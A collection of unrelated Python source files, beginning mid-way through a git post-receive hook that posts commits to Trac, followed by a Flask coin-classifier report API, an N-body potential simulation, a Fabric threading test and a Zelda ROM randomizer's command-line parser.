#convert cd over so as not to break anyone's.
kwargs['cwd']=cd
p = subprocess.Popen(cmd, stdin=stdin,
stdout=(stdout or (logger and PIPE)),
stderr=(stderr or (logger and PIPE)),
**kwargs)
if logger :
def monitor(level, src, name) :
lname = "%s.%s" % (cmd[0], name)
if(hasattr(logger, 'name')) :
lname = "%s.%s" % (logger.name, lname)
sublog = logging.getLogger(lname)
def tfn() :
l = src.readline()
while l != "":
sublog.log(level,l.strip())
l = src.readline()
th = threading.Thread(target=tfn,name=lname)
p.__setattr__("std%s_thread" % name, th)
th.start()
if stdout == None : monitor(stdout_level, p.stdout,"out")
if stderr == None : monitor(stderr_level, p.stderr,"err")
return p
def gitPopen(gitdir, cmd, **kwargs) :
"""Popen git with the given command and the git-dir given. kwargs
are passed onwards to popen."""
cmd = ["git","--git-dir="+gitdir] + cmd
return capturedPopen(cmd, logger=log, **kwargs)
def find_all_refs(gitdir) :
"Get a list of all ref names in the git database, i.e. any head or tag name"
git = gitPopen(gitdir, ["show-ref"], stdout=PIPE)
return set(line.split()[1] for line in git.stdout)
def new_commits(gitdir, ref_updates) :
"""For the given gitdir and list of ref_updates (an array that
holds [oldrev,newrev,refname] arrays) find any commit that is new
to this repo.
This works primarily by issuing a:
git rev-list new1 ^old1 new2 ^old2 ^refs/tags/foo ^refs/heads/bar
This function yields commits that are new in the format:
[hash, author, date, message]
"""
#the set of previously reachable roots starts as a list of all
#refs currently known, which is post-receive so we will need to
#remove some from here. Everything left will become ^refs.
prev_roots = find_all_refs(gitdir)
log.debug("Found %s named refs", len(prev_roots))
#open the rev-list process and make a writer function to it.
grl = gitPopen(gitdir, ["rev-list","--reverse", "--stdin",
"--pretty=tformat:%an <%ae>%n%ci%n%s%n%+b"],
stdin=PIPE, stdout=PIPE)
def w(ref) : grl.stdin.write(ref + "\n")
for (old,new,ref) in ref_updates :
#branch deletion: newval is 00000, skip the ref, leave it in
#the list of prev_roots
if re.match("^0+$",new) : continue
#Include the newrev as now reachable.
w(new)
#a ref that is being updated should be removed from the
#previous list and ...
prev_roots.discard(ref)
#instead write out the negative line directly. However, if it
#is a new branch (denoted by all 0s) there is no negative to
#include for this ref.
if re.search("[1-9]",old) :
w("^" + old)
else :
log.info("New ref %r", ref)
log.debug("After discarding updates, writing %s prev_roots",
len(prev_roots))
#write lines for (not reachable from anything else')
for ref in prev_roots : w("^" + ref)
grl.stdin.close()
### this is a little parser for the format
#commit <hash>
#<Author>
#<Date>
#<msg>
#<blank line>
commit = None
msg = ""
def finish() :
commit.append(msg[:-1]) #-1 to strip one \n from the pair.
log.info("New commit: %r", commit)
return commit
while True :
line = grl.stdout.readline()
#blank line and exit code set, we're done here.
if line == '' and grl.poll() != None :
if commit: yield finish()
log.debug("Exiting loop: %s", grl.poll())
break
m = re.match("commit ([0-9a-f]+)$", line)
if m : #start of a new commit
if commit: yield finish()
log.debug("Starting new commit: %s", m.group(1))
hash = m.group(1)
author = grl.stdout.readline().strip()
date = grl.stdout.readline().strip()
commit = [hash,author,date]
msg = grl.stdout.readline()
else :
msg += line
def post(commits, gitdir, cname, trac_env) :
for [rev,author,date,msg] in commits :
#this subprocess uses python logging with the same formatter,
#so tell it not to log, and pass through our streams and its
#logging should just fall in line.
log.debug("Posting %s to trac", rev)
capturedCall(["python", TRAC_POST_COMMIT,
"-p", trac_env or "",
"-r", rev,
"-u", author,
"-m", msg,
cname],
logger=None,
stdout=sys.stdout,
stderr=sys.stderr)
def process(gitdir, cname, trac_env, ref_updates) :
log.info("Push by %r; CNAME: %r, TRAC_ENV: %r, updating %s refs",
getpass.getuser(), cname, trac_env, len(updates))
post(new_commits(gitdir,ref_updates), gitdir, cname, trac_env)
log.info("Finished commit hook loop, git-post-receive")
#################################################################
#### Runtime control
parser = OptionParser(""" """)
parser.add_option("-v", "--verbose", action="store_true", dest="verbose",
help="Show more verbose log messages.")
if __name__ == "__main__":
(options, args) = parser.parse_args()
#when run as a hook the directory is the git repo.
#either /var/git/ServerManagement.git
#or /var/git/ServerManagement/.git
gitdir = os.getcwd()
cname = os.getenv("CNAME")
if cname == None :
if len(args) >= 1 :
cname = args.pop(0)
else :
#strip off .git if it is bare or /.git if it is a checkout.
cname = re.sub("/?\.git$","", gitdir)
cname = os.path.basename(cname)
TRAC_ENV = os.getenv("TRAC_ENV") or os.path.join("/var/trac/",cname)
#### Logging configuration
log.setLevel(logging.DEBUG)
## log verbosely to a file
logfile=os.path.join(logdir, "%s.git-post-receive.log" % cname)
fh = logging.FileHandler(logfile,mode='a')
fh.setFormatter(logging.Formatter('%(asctime)s %(name)s %(levelname)-8s %(message)s',
datefmt='%Y%m%d %H:%M:%S'))
## and to standard error keep the level higher
sh = logging.StreamHandler()
sh.setLevel(options.verbose and logging.DEBUG or logging.INFO)
sh.setFormatter(logging.Formatter("%(asctime)s %(name)s %(levelname)-8s %(message)s",
datefmt='%H:%M:%S'))
log.addHandler(sh)
log.addHandler(fh)
log.info("----- git-post-receive.py -----")
#Where will we be posting to?
if not os.path.exists(TRAC_ENV) :
logging.warn("None existant trac_env: %s", TRAC_ENV)
TRAC_ENV = None
#actually read the ref updates from stdin
updates = [line.split() for line in sys.stdin]
process(gitdir, cname, TRAC_ENV, updates)
# # The MIT License
# # Copyright (c) 2010 Acceleration.net
# # Permission is hereby granted, free of charge, to any person obtaining a copy
# # of this software and associated documentation files (the "Software"), to deal
# # in the Software without restriction, including without limitation the rights
# # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# # copies of the Software, and to permit persons to whom the Software is
# # furnished to do so, subject to the following conditions:
# # The above copyright notice and this permission notice shall be included in
# # all copies or substantial portions of the Software.
# # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# # THE SOFTWARE.
|
report.py | from datetime import datetime
from os import makedirs, path, remove
from os.path import join, exists
from shutil import rmtree
from flask import Blueprint, Response, request
from flask.helpers import send_file
from threading import Thread
from modules.AI.classifier_trainer import ClassifierTrainer
from services.classifier import ClassifierService
import json
import uuid
from shutil import copyfile
from services.settings import SettingsService
from services.users import UsersService
reports = Blueprint('reports', __name__)
SETTINGS_FILE = path.sep.join(["settings.json"])
SETTINGS = SettingsService(SETTINGS_FILE)
USERS = UsersService()
CLASSIFIER = ClassifierService()
# GET /report?id=<uuid>
@reports.route('/report')
def report():
user_id = USERS.getUserId(request)
if user_id is None:
return Response(status=401)
# get report id from request
if 'id' in request.args:
id = request.args['id']
# Not the owner
if not isOwner(user_id, id):
return Response(status=403)
path = join(SETTINGS.getReportFolder(), id, 'data.json')
# check if report exists
if (not exists(path)):
return Response(status=404)
# just send the report data file
return send_file(path, mimetype='application/json')
return Response("{'success': false, 'message': 'Incorrect request'}", status=500, mimetype='application/json')
# GET /report/image?id=<id>
# GET /report/image?id=<id>&zone=<id>
@reports.route('/report/image')
def report_image():
# We need an user id to proceed with firebase storage methods
user_id = USERS.getUserId(request)
if user_id is None:
return Response(status=401)
# get zone image (need report id & zone id)
path = None
if 'id' in request.args and 'zone' in request.args:
id = request.args['id']
# Not the owner
if not isOwner(user_id, id):
return Response(status=403)
zone = request.args['zone']
path = join(SETTINGS.getReportFolder(), id, 'zones', str(zone) + '.png')
# get report image (need report id 'debug' or 'normal')
elif 'id' in request.args:
id = request.args['id']
# Not the owner
if not isOwner(user_id, id):
return Response(status=403)
# check if 'debug' is requested
file = "detections.png" if ('debug' in request.args and request.args['debug']) else "original.png"
path = join(SETTINGS.getReportFolder(), id, file)
# if 'debug' is requested, check if the file exists
# else, return the original file
if (not exists(path)):
path = join(SETTINGS.getReportFolder(), id, 'original.png')
# if 'path' is not None, send the image
if (path is not None):
return send_file(path, mimetype='image/png')
return Response("{'success': false, 'message': 'Incorrect request'}", status=500, mimetype='application/json')
# DELETE /report?uid=<uid>&id=<uuid>
@reports.route('/report', methods=['DELETE'])
def delete_report():
# We need an user id to proceed with firebase storage methods
user_id = USERS.getUserId(request)
if user_id is None:
return Response(status=401)
if 'id' in request.args:
id = request.args['id']
path = join(SETTINGS.getReportFolder(), id)
# Retrieve list from firebase
reports = USERS.getReports(user_id)
owner = False
# Check if the report is owned by the user
for (i, report) in enumerate(reports):
if report['id'] == id:
reports.pop(i)
owner = True
break
# Not the owner
if not owner:
return Response(status=403)
# Delete report folder if the user is the owner
rmtree(path)
# Remove report from firebase
reports.remove(id)
# Tell firebase to update
USERS.setReports(user_id, reports)
# Return success
return Response("{'success': true}", status=200, mimetype='application/json')
return Response("{'success': false, 'message': 'Incorrect request'}", status=500, mimetype='application/json')
# PUT /report/?id=<uuid>&zone=<zone_id>
# Update zone and make correction, need to set confidence to 0, to recalculate score
# TODO: Add image that are incorrect to our Dataset automatically
@reports.route('/report', methods=['PUT'])
def report_put():
# We need an user id to proceed with firebase storage methods
user_id = USERS.getUserId(request)
if user_id is None:
return Response(status=401)
# edit zone result (need report id & zone id)
if 'id' in request.args and 'zone' in request.args:
id = request.args['id']
zone = int(request.args['zone'])
# Not the owner
if not isOwner(user_id, id):
return Response(status=403)
# Check if the coin is in the data body of the request
if 'coin' in request.json:
coin = request.json['coin']
# coin is like '1e_front'
# '{class}_{face}'
coinParts = coin.split('_') # split parts
# We need only 2 parts, not less or more
if (len(coinParts) != 2):
return Response("{'success': false, 'message': 'Incorrect format'}", status=500, mimetype='application/json')
# Check that the coin is in the list of valid coins
if (coinParts[0] not in SETTINGS.getCoins()):
return Response("{'success': false, 'message': 'Incorrect coin'}", status=500, mimetype='application/json')
# Check that the face is in the list of valid faces
if (coinParts[1] not in ['back','front']):
return Response("{'success': false, 'message': 'Incorrect side'}", status=500, mimetype='application/json')
# PATH of the data
path = join(SETTINGS.getReportFolder(), id, 'data.json')
# Check if the report exists
if (not exists(path)):
return Response(status=404)
# Load the data from the file
data = json.load(open(path))
# retrieve the zone
for zone_data in data['zones']:
if zone_data['id'] == zone:
# Make path to dataset folder
addToDataset = False
# Path of folder, if is already in the generated dataset
oldDataset_path = join(SETTINGS.getDatasetFolder(), zone_data['coin'])
# Path of folder, in case if is not in the generated dataset
newDataset_path = join(SETTINGS.getDatasetFolder(), coin)
# Create the folder if it does not exist
if (not exists(oldDataset_path)):
makedirs(oldDataset_path)
if (not exists(newDataset_path)):
makedirs(newDataset_path)
# Build path of the image
oldDataset_path = join(oldDataset_path, '%s_%d.png' % (id, zone))
newDataset_path = join(newDataset_path, '%s_%d.png' % (id, zone))
# Backup the original data
if "old_coin" not in zone_data:
zone_data['old_coin'] = zone_data['coin']
zone_data['old_confidence'] = zone_data['confidence']
# Need to add to our generated dataset
addToDataset = True
# Restore the original data if the new coin is the same than the old one
if zone_data['old_coin'] == coin:
# Remove from generated dataset
# because the new coin is the same than the old one so the AI didn't make a mistake
if exists(oldDataset_path):
remove(oldDataset_path)
# Restore the old data
zone_data['coin'] = zone_data['old_coin']
zone_data['confidence'] = zone_data['old_confidence']
# Delete the old data from json
del zone_data['old_coin']
del zone_data['old_confidence']
# Decrease the error count
SETTINGS.decErrorCount()
# Else, that mean the AI made a mistake
# need to null the old data
else:
# Remove from generated dataset
# in case of the previous coin was also edited and marked as incorrect
# ex: initial : 2e_front,
# request 1 : change to '1e_front'
# request 2 : change to '1e_back'
if exists(oldDataset_path):
# Decrease the error count if the old coin was also edited
SETTINGS.decErrorCount()
# Remove the old image
remove(oldDataset_path)
# Null the old data
zone_data['coin'] = coin
zone_data['confidence'] = 0.0
# Need to add to our generated dataset
addToDataset = True
# Increase the error count
SETTINGS.incErrorCount()
# Add the image to the dataset if needed and the coin is not a null coin
if (addToDataset and coinParts[0] != '0'):
# if is not already in training and check if error count is enought to make a new training
if (not SETTINGS.isTraining() and SETTINGS.getErrorCount() >= SETTINGS.getTrainAfter()):
# Try to start a new Thread to don't interrupt the API
try:
thread = Thread(target=trainModel)
thread.daemon = True
thread.start()
print("Started training")
SETTINGS.setTraining(True)
except:
# If an error occurs, set the training to false to cancel it
SETTINGS.setTraining(False)
pass
# Copy the coin image to the correct dataset folder
copyfile(join(SETTINGS.getReportFolder(), id, "zones", "%d.png" % zone), join(SETTINGS.getDatasetFolder(), coin, '%s_%d.png' % (id, zone)))
break
# Update the values
# Calculated, score
data['calculated'] = 0
data['score'] = 0.0
for zone_data in data['zones']:
# zone_data['coin'] is like '1e_front', need to split to get the coin value
data['calculated'] += SETTINGS.getCoins()[zone_data['coin'].split('_')[0]]
data['score'] += zone_data['confidence']
# if number of coins is 0, useless to calculate the score
if (len(data['zones']) > 0):
data['score'] /= len(data['zones'])
# Update the file
with open(path, 'w') as f:
json.dump(data, f)
return Response("{'success': true}", status=200, mimetype='application/json')
return Response("{'success': false, 'message': 'Incorrect request'}", status=500, mimetype='application/json')
def isOwner(user_id, report_id):
# Retrieve list from firebase
reports = USERS.getReports(user_id)
# Check if the report is owned by the user
for report in reports:
if report == report_id:
return True
def trainModel():
id = str(uuid.uuid4())
print("Training model %s..." % id)
# PATH to each file
modelPath = join(SETTINGS.getModelFolder(), id)
modelTrainedPath = join(modelPath, "model.h5")
modelInfoPath = join(modelPath, "info.json")
# Retrieve the images count for each label
imgCount = ClassifierTrainer().train(modelTrainedPath, SETTINGS.getLabel(), SETTINGS.getDatasetFolder(), SETTINGS.getTrainEpochs())
# Create the folder if it does not exist
if (not exists(modelPath)):
makedirs(modelPath)
modelInfo = {
'id': id,
'pictures_count': imgCount,
'datetime': datetime.now().isoformat()
}
# Dump the file
with open(modelInfoPath, 'w') as f:
json.dump(modelInfo, f)
print("Model %s trained" % id)
# update config
CLASSIFIER.getClassifier().setModel(modelTrainedPath)
return modelTrainedPath
|
directSummation.py | """
A Program to compute and plot N Body simulation for learning purposes (Following Prof. Barba's Group)
@author : Vijai Kumar
@email : vijai@vijaikumar.in
"""
# Import the necessary libraries
import numpy as np
import matplotlib.pylab as plt
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from itertools import cycle
from funcy import flatten
import datetime
import time
import multiprocessing
# Matplotlib Globals
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# A simple data structure for storing the point
class Point():
"""
A Simple point structure that holds a point or could create a random point
"""
def __init__(self, coordinates=list(), domain=1.0):
self.domain = domain
if coordinates:
self.x = coordinates[0]
self.y = coordinates[1]
self.z = coordinates[2]
else:
self.x = self.domain * np.random.random()
self.y = self.domain * np.random.random()
self.z = self.domain * np.random.random()
def getNumpyArray(self):
return np.array([self.x,self.y,self.z])
def distance(self, other):
xDiff = other.x - self.x
xSquared = xDiff * xDiff
yDiff = other.y - self.y
ySquared = yDiff * yDiff
zDiff = other.z - self.z
zSquared = zDiff * zDiff
dist = np.sqrt(xSquared + ySquared + zSquared)
return dist
def __str__(self):
return ("{0}(Coordinates->( {1} / {2} / {3} ),Domain->{4})".format(self.__class__.__name__, self.x, self.y, self.z,self.domain))
def __repr__(self):
return ("{0},{1},{2},{4}".format(self.x, self.y, self.z,self.domain))
# A Particle class
class Particle(Point):
"""
A Simple structure to hold a particle and all of its neighbours
"""
def __init__(self, coordinates=list(), domain=1.0, mass=0.1, idx=None):
Point.__init__(self, coordinates=coordinates, domain=domain)
self.m = mass
self.domain = domain
self.Neighbours = list()
self.idx = idx
self.phi = 0.0
def getId(self):
return self.idx
def addNeighbour(self, Neighbour):
self.Neighbours.append(Neighbour)
def getNeighBours(self):
return self.Neighbours
def getNeighBoursCount(self):
return len(self.Neighbours)
def __str__(self):
return ("{0}(Idx->{1},Coordinates->( {2} / {3} / {4} ),Mass->{5},Potential->{6})".format(self.__class__.__name__, self.idx, self.x, self.y, self.z,self.m,self.phi))
def __repr__(self):
return ("{0},{1},{2},{4},{5},{6}".format(self.x, self.y, self.z,self.domain,self.mass,self.idx))
# Create random particles
def createParticles(n):
particles = list()
for i in range(1,n):
particle = Particle(mass=(1.0/i),idx=i)
particles.append(particle)
return particles
# Compute neighbour for 1 particle
def findNeighbourForSingleParticle(currentParticle, particleArray,tolerance):
for part in particleArray:
if part != currentParticle:
distance = currentParticle.distance(part)
if (distance < tolerance) or (distance == tolerance):
currentParticle.addNeighbour(part)
# Multithreaded version of compute neighbours (Not really required in this code)
def createParticlesAndComputeNeighbours(n,tolerance):
particles = createParticles(n)
jobs = list()
for particle in particles:
currentParticle = particle
p = multiprocessing.Process(target=findNeighbourForSingleParticle, args=(currentParticle,particles,tolerance))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
return particles
# Compute potential for 1 particle
def directSummationForSingleParticle(currentTarget,particleList,sharedVariable):
for source in particleList:
if source != currentTarget: # To avoid self contribution
radius = currentTarget.distance(source)
currentTarget.phi = currentTarget.phi + (source.m/radius)
sharedVariable.append(currentTarget.phi)
# Direct summation code (Multithreaded)
def directSummation(particleList):
jobs = list()
manager = multiprocessing.Manager()
sharedVariable = manager.list()
for target in particleList:
currentTarget = target
p = multiprocessing.Process(target=directSummationForSingleParticle, args=(currentTarget,particleList,sharedVariable))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
targetCounter = 0
for target in particleList:
target.phi = sharedVariable[targetCounter]
targetCounter = targetCounter + 1
# Plot the N body result
def plotParticles(particles):
fig = plt.figure(figsize=(20.0, 10.0))
plt.subplots_adjust(top=0.986,bottom=0.014,left=0.007,right=0.993,hspace=0.2,wspace=0.2)
# left plot
ax = fig.add_subplot(1,2,1, projection='3d')
ax.scatter([particle.x for particle in particles],
[particle.y for particle in particles],
[particle.z for particle in particles], s=30, c='b')
ax.set_xlim3d(0,1)
ax.set_ylim3d(0,1)
ax.set_zlim3d(0,1)
ax.set_xlabel(r'$X Axis$')
ax.set_ylabel(r'$Y Axis$')
ax.set_zlabel(r'$Z Axis$')
ax.set_title(r'$\textsc{Particle Distribution}$')
# right plot
ax = fig.add_subplot(1,2,2, projection='3d')
scale = 50 # scale for dot size in scatter plot
ax.scatter([particle.x for particle in particles],
[particle.y for particle in particles],
[particle.z for particle in particles],
s=np.array([particle.phi for particle in particles])*scale, c='b')
ax.set_xlim3d(0,1)
ax.set_ylim3d(0,1)
ax.set_zlim3d(0,1)
ax.set_xlabel(r'$X Axis$')
ax.set_ylabel(r'$Y Axis$')
ax.set_zlabel(r'$Z Axis$')
ax.set_title(r'\textsc{Particle Distribution (Radius implies potential)}')
plt.savefig('potential_direct_summation.pdf')
if __name__ == "__main__":
numberOfParticles = 100
tolerance = 0.15
particles = createParticlesAndComputeNeighbours(numberOfParticles,0.15)
directSummation(particles)
plotParticles(particles) |
concurrency.py | import codecs
from invoke.vendor.six.moves.queue import Queue
from invoke.vendor.six.moves import zip_longest
from invoke.util import ExceptionHandlingThread
from pytest import skip
from fabric import Connection
_words = "/usr/share/dict/words"
def _worker(queue, cxn, start, num_words, count, expected):
tail = num_words - start
cmd = "tail -n {} {} | head -n {}".format(tail, _words, count)
stdout = cxn.run(cmd, hide=True).stdout
result = [x.strip() for x in stdout.splitlines()]
queue.put((cxn, result, expected))
class concurrency:
# TODO: still useful to use Group API here? Where does this responsibility
# fall between Group and Executor (e.g. phrasing this specifically as a
# generic subcase of Invoke level task parameterization)?
# TODO: spin up multiple temp SSHDs / Paramiko servers / ???
def setup(self):
cxn1 = Connection("localhost")
cxn2 = Connection("localhost")
cxn3 = Connection("localhost")
self.cxns = (cxn1, cxn2, cxn3)
def connections_objects_do_not_share_connection_state(self):
cxn1, cxn2, cxn3 = self.cxns
[x.open() for x in self.cxns]
# Prove no exterior connection caching, socket reuse, etc
# NOTE: would phrase these as chained 'is not' but pep8 linter is being
# stupid :(
assert cxn1 is not cxn2
assert cxn2 is not cxn3
assert cxn1.client is not cxn2.client
assert cxn2.client is not cxn3.client
ports = [x.transport.sock.getsockname()[1] for x in self.cxns]
assert ports[0] is not ports[1] is not ports[2]
def manual_threading_works_okay(self):
# TODO: needs https://github.com/pyinvoke/invoke/issues/438 fixed
# before it will reliably pass
skip()
# Kind of silly but a nice base case for "how would someone thread this
# stuff; and are there any bizarre gotchas lurking in default
# config/context/connection state?"
# Specifically, cut up the local (usually 100k's long) words dict into
# per-thread chunks, then read those chunks via shell command, as a
# crummy "make sure each thread isn't polluting things like stored
# stdout" sanity test
queue = Queue()
# TODO: skip test on Windows or find suitable alternative file
with codecs.open(_words, encoding="utf-8") as fd:
data = [x.strip() for x in fd.readlines()]
threads = []
num_words = len(data)
chunksize = len(data) / len(self.cxns) # will be an int, which is fine
for i, cxn in enumerate(self.cxns):
start = i * chunksize
end = max([start + chunksize, num_words])
chunk = data[start:end]
kwargs = dict(
queue=queue,
cxn=cxn,
start=start,
num_words=num_words,
count=len(chunk),
expected=chunk,
)
thread = ExceptionHandlingThread(target=_worker, kwargs=kwargs)
threads.append(thread)
for t in threads:
t.start()
for t in threads:
t.join(5) # Kinda slow, but hey, maybe the test runner is hot
while not queue.empty():
cxn, result, expected = queue.get(block=False)
for resultword, expectedword in zip_longest(result, expected):
err = u"({2!r}, {3!r}->{4!r}) {0!r} != {1!r}".format(
resultword, expectedword, cxn, expected[0], expected[-1]
)
assert resultword == expectedword, err
|
main.py | import binascii
from romTables import ROMWithTables
import shlex
import randomizer
import logic
import spoilerLog
import re
from argparse import ArgumentParser, ArgumentTypeError
def goal(goal):
if goal == "random":
goal = "-1-8"
elif goal in [ "seashells", "raft" ]:
return goal
m = re.match(r'^(-?\d|open)(?:-(\d))?$', goal)
if not m:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (open, 0, 1, 2 ... 8), a range (open-6, 1-4, 5-8, ...) or 'seashells' / 'raft'.")
start = m.group(1)
if start == "open":
start = "-1"
start = int(start)
end = m.group(2) or start
end = int(end)
if start < -1 or start > 8 or end < -1 or end > 8:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (-1, 0, 1, 2 ... 8), a range (1-4, 5-8, ...) or 'seashells' / 'raft'.")
if end == start:
return start
elif end < start:
raise ArgumentTypeError("'" + goal + "' is not valid: expected a number (-1, 0, 1, 2 ... 8), a range (1-4, 5-8, ...) or 'seashells' / 'raft'.")
return range(start, end+1)
def main(mainargs=None):
import argparse
import sys
parser = argparse.ArgumentParser(description='Randomize!')
parser.add_argument('input_filename', metavar='input rom', type=str,
help="Rom file to use as input.")
parser.add_argument('-o', '--output', dest="output_filename", metavar='output rom', type=str, required=False,
help="Output filename to use. If not specified [seed].gbc is used.")
parser.add_argument('--dump', dest="dump", type=str, nargs="*",
help="Dump the logic of the given rom (spoilers!)")
parser.add_argument('--spoilerformat', dest="spoilerformat", choices=["none", "console", "text", "json"], default="none",
help="Sets the output format for the generated seed's spoiler log")
parser.add_argument('--spoilerfilename', dest="spoiler_filename", type=str, required=False,
help="Output filename to use for the spoiler log. If not specified, LADXR_[seed].txt/json is used.")
parser.add_argument('--test', dest="test", action="store_true",
help="Test the logic of the given rom, without showing anything.")
parser.add_argument('-s', '--seed', dest="seed", type=str, required=False,
help="Generate the specified seed")
parser.add_argument('--romdebugmode', dest="romdebugmode", action="store_true",
help="Patch the rom so that debug mode is enabled, this creates a default save with most items and unlocks some debug features.")
parser.add_argument('--exportmap', dest="exportmap", action="store_true",
help="Export the map (many graphical mistakes)")
parser.add_argument('--emptyplan', dest="emptyplan", type=str, required=False,
help="Write an unfilled plan file")
parser.add_argument('--timeout', type=float, required=False,
help="Timeout generating the seed after the specified number of seconds")
parser.add_argument('--logdirectory', dest="log_directory", type=str, required=False,
help="Directory to write the JSON log file. Generated independently from the spoiler log and omitted by default.")
# Flags that effect gameplay
parser.add_argument('--plan', dest="plan", metavar='plandomizer', type=str, required=False,
help="Read an item placement plan")
parser.add_argument('--race', dest="race", nargs="?", default=False, const=True,
help="Enable race mode. This generates a rom from which the spoiler log cannot be dumped and the seed cannot be extracted.")
parser.add_argument('--logic', dest="logic", choices=["casual", "normal", "hard", "glitched", "hell"],
help="Which level of logic is required.")
parser.add_argument('--multiworld', dest="multiworld", type=int, required=False,
help="Generates multiple roms for a multiworld setup.")
parser.add_argument('--multiworld-config', dest="multiworld_config", action="append", required=False,
help="Set configuration for a multiworld player, supply multiple times for settings per player")
parser.add_argument('--forwardfactor', dest="forwardfactor", type=float, required=False,
help="Forward item weight adjustment factor, lower values generate more rear heavy seeds while higher values generate front heavy seeds. Default is 0.5.")
parser.add_argument('--heartpiece', dest="heartpiece", action="store_true",
help="Enables randomization of heart pieces.")
parser.add_argument('--seashells', dest="seashells", action="store_true",
help="Enables seashells mode, which randomizes the secret sea shells hiding in the ground/trees. (chest are always randomized)")
parser.add_argument('--heartcontainers', dest="heartcontainers", action="store_true",
help="Enables heartcontainer mode, which randomizes the heart containers dropped by bosses.")
parser.add_argument('--instruments', dest="instruments", action="store_true",
help="Shuffle the instruments in the item pool.")
parser.add_argument('--owlstatues', dest="owlstatues", choices=['none', 'dungeon', 'overworld', 'both'], default='none',
help="Give the owl statues in dungeons or on the overworld items as well, instead of showing the normal hints")
parser.add_argument('--dungeon-items', dest="dungeon_items", choices=['standard', 'localkeys', 'localnightmarekey', 'keysanity', 'keysy'], default='standard',
help="Sets what gets done with dungeon items, if they are in their own dungeon or not.")
parser.add_argument('--randomstartlocation', dest="randomstartlocation", action="store_true",
help="Place your starting house at a random location.")
parser.add_argument('--dungeonshuffle', dest="dungeonshuffle", action="store_true",
help="Enable dungeon shuffle, puts dungeons on different spots.")
parser.add_argument('--entranceshuffle', dest="entranceshuffle", choices=["none", "simple", "advanced", "expert", "insanity"], default="none",
help="Enable entrance shuffle, shuffles around overworld entrances.")
parser.add_argument('--boss', dest="boss", choices=["default", "shuffle", "random"], default="default",
help="Enable boss shuffle, swaps around dungeon bosses.")
parser.add_argument('--miniboss', dest="miniboss", choices=["default", "shuffle", "random"], default="default",
help="Shuffle the minibosses or just randomize them.")
parser.add_argument('--doubletrouble', dest="doubletrouble", action="store_true",
help="...")
parser.add_argument('--witch', dest="witch", action="store_true",
help="Enables witch and toadstool in the item pool.")
parser.add_argument('--hpmode', dest="hpmode", choices=['default', 'inverted', '1'], default='default',
help="Set the HP gamplay mode. Inverted causes health containers to take HP instead of give it and you start with more health. 1 sets your starting health to just 1 hearth.")
parser.add_argument('--boomerang', dest="boomerang", choices=['default', 'trade', 'gift'], default='default',
help="Put the boomerang and the trade with the boomerang in the item pool")
parser.add_argument('--steal', dest="steal", choices=['never', 'always', 'default'], default='always',
help="Configure when to allow stealing from the shop.")
parser.add_argument('--hard-mode', dest="hardMode", action="store_true",
help="Make the game a bit harder, less health from drops, bombs damage yourself, and less iframes.")
parser.add_argument('--goal', dest="goal", type=goal, default='8',
help="Configure the instrument goal for this rom: any number between -1 (open egg) and 8, a range (e.g. 4-7), 'random', or 'raft' / 'seashells' for special goals.")
parser.add_argument('--accessibility', dest="accessibility_rule", choices=['all', 'goal'],
help="Switches between making sure all locations are reachable or only the goal is reachable")
parser.add_argument('--bowwow', dest="bowwow", choices=['normal', 'always', 'swordless'], default='normal',
help="Enables 'good boy mode', where BowWow is allowed on all screens and can damage bosses and more enemies.")
parser.add_argument('--pool', dest="itempool", choices=['normal', 'casual', 'pain', 'keyup'], default='normal',
help="Sets up different item pools, for easier or harder gameplay.")
parser.add_argument('--overworld', dest="overworld", choices=['normal', 'dungeondive'], default='normal',
help="Allows switching to the dungeondive overworld, where there are only dungeons.")
parser.add_argument('--pymod', dest="pymod", action='append',
help="Load python code mods.")
# Just aestetic flags
parser.add_argument('--gfxmod', dest="gfxmod", action='append',
help="Load graphical mods.")
parser.add_argument('--remove-flashing-lights', dest="removeFlashingLights", action="store_true",
help="Remove the flashing light effects from mamu, the shopkeeper and madbatter.")
parser.add_argument('--quickswap', dest="quickswap", choices=['none', 'a', 'b'], default='none',
help="Configure quickswap for A or B button (select key swaps, no longer opens map)")
parser.add_argument('--textmode', dest="textmode", choices=['default', 'fast', 'none'], default='default',
help="Default just keeps text normal, fast makes text appear twice as fast, and none removes all text from the game.")
parser.add_argument('--nag-messages', dest="removeNagMessages", action="store_false",
help="Enable the nag messages on touching stones and crystals. By default they are removed.")
parser.add_argument('--lowhpbeep', dest="lowhpbeep", choices=['default', 'slow', 'none'], default='slow',
help="Slows or disables the low health beeping sound")
parser.add_argument('--linkspalette', dest="linkspalette", type=int, default=None,
help="Force the palette of link")
parser.add_argument('--music', dest="music", choices=['default', 'random', 'off'], default='default',
help="Randomizes or disable the music")
args = parser.parse_args(mainargs)
if args.multiworld is not None:
args.multiworld_options = [args] * args.multiworld
if args.multiworld_config is not None:
for index, settings_string in enumerate(args.multiworld_config):
args.multiworld_options[index] = parser.parse_args([args.input_filename] + shlex.split(settings_string),
namespace=argparse.Namespace(**vars(args)))
if args.timeout is not None:
import threading
import time
import os
def timeoutFunction():
time.sleep(args.timeout)
print("TIMEOUT")
sys.stdout.flush()
os._exit(1)
threading.Thread(target=timeoutFunction, daemon=True).start()
if args.exportmap:
import mapexport
print("Loading: %s" % (args.input_filename))
rom = ROMWithTables(args.input_filename)
mapexport.MapExport(rom)
sys.exit(0)
if args.emptyplan:
import locations.items
f = open(args.emptyplan, "wt")
f.write(";Plandomizer data\n;Items: %s\n" % (", ".join(map(lambda n: getattr(locations.items, n), filter(lambda n: not n.startswith("__"), dir(locations.items))))))
f.write(";Modify the item pool:\n")
f.write(";Pool:SWORD:+5\n")
f.write(";Pool:RUPEES_50:-5\n")
import worldSetup
